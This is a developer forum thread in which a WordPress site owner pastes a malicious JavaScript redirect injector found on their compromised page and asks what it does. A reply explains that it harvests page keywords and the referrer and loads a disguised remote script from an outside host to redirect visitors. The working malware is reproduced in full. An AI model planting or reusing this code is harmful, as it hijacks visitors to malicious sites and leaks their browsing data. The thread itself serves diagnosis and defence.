Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
Y
Y
Yermek2016-06-23 07:19:18
JavaScript
Yermek, 2016-06-23 07:19:18

What does this virus do?

Good day everyone.
After the next WordPress update, Yandex swore at my site for the presence of the Troj/JSRedir-RX
virus. Armed with the built-in editor and Chrom, I found the following code on my page (I added the checkOne function myself to make it easier to read)
Well, the subject itself.

function checkOne()
{
  var keywords='';
  var metas=document.getElementsByTagName('meta');
  if(metas)
  {
    for(var x=0,y=metas.length;x<y;x++)
    {
      if(metas[x].name.toLowerCase()=="keywords")
      {
        keywords+=metas[x].content;
        }
    }
  }
  return keywords!==''?keywords:null;
}

  var a='';
  setTimeout(10);
  if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0
    ||document.referrer!==undefined||document.referrer!==''
    ||document.referrer!==null){
      document.write('<script type="text/javascript" 
          src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm='
          +encodeURIComponent('http://ktm-pohlenz.de/js/jquery.min.php'+'?'
          +'default_keyword='
          +encodeURIComponent(
            (
              (k=checkOne())==null?(
                v=window.location.search.match(/utm_term=([^&]+)/))==null?
                  (t=document.title)==null?'':t
                :v[1]
              :k))
              +'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

1 answer(s)
Report
C
Cat Anton, 2016-06-23
@ermek6

1. The function checkOne()gets the keywords from the tag <meta name="keywords" content="..." />
2. If the keywords are not found, then the script takes the keywords from utm_term.
3. If key phrases from utm_term are not found, then the title of the page is used.
The found keywords are encoded and sent to ktm-pohlenz.de/js/jquery.min.php. As a result, JavaScript is inserted that redirects the user to the URL that best matches the found keywords and the page's HTTP referer. Example for this page:
PS: The redirect is not always returned. Perhaps there is some kind of filtering on the side of ktm-pohlenz.de by IP, UA, c_utt parameter, etc.

Similar questions
Y
YakovSpb2021-06-01 14:29:13
How can I display posts only those that are in the time frame? 2Reply
M
MrAfitol2021-06-01 19:44:14
How to play sound through discord bot? 2Reply
L
lexstile2021-06-03 16:39:01
Why doesn't onChange work for input with type number when you enter a dot or comma? 4Reply
H
HelpSophie2019-12-23 00:24:07
How to simplify the initialization of five swiper sliders? 2Reply
D
Dmitry Markov2019-12-24 15:24:51
How to display fields generated in function php? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question